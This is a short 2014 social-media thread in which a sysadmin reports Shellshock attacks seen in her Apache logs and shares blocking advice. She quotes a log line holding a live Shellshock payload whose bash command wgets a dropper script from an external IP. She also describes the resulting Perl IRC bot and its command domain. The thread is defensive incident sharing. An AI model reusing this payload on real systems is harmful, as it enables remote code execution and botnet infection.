Conversation:
Notices
-
kat (boneidol)'s status on Friday, 26-Sep-2014 11:38:13 EDT 
kat
every man and his dog wants to get in on this #shellshock mess. grep "}" /var/log/apache2/ssl_access.log 127.0.0.1 - - [26/Sep/2014:11:20:43 +0000] "GET /test HTTP/1.0" 404 5067 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wo… -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:42:33 EDT
kat
I'm running rsyslogd with some anonymity patches so you cannot see the IP address of the attacker. -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:43:03 EDT
kat
But she has leaked the ip address of the dropper script http://pastebin.com/jLjZqLwD -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:47:36 EDT
kat
Which is some ugly perl irc bot. they delete the script after running it. -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:48:16 EDT
kat
so , it won't survive a reboot, if it's not dropped something worse on your system before that. -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:49:03 EDT
kat
Hides the running process as nagios nrpe -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:50:15 EDT
kat
block fbi.bot.nu on your firewalls -
kat (boneidol)'s status on Friday, 26-Sep-2014 11:54:41 EDT
kat
I'm going to set my ( and any clients I can help ) DNS servers to be authoritative for that domain and return localhost for anything in it
-
All New Hampshire Crossing content and data are available under the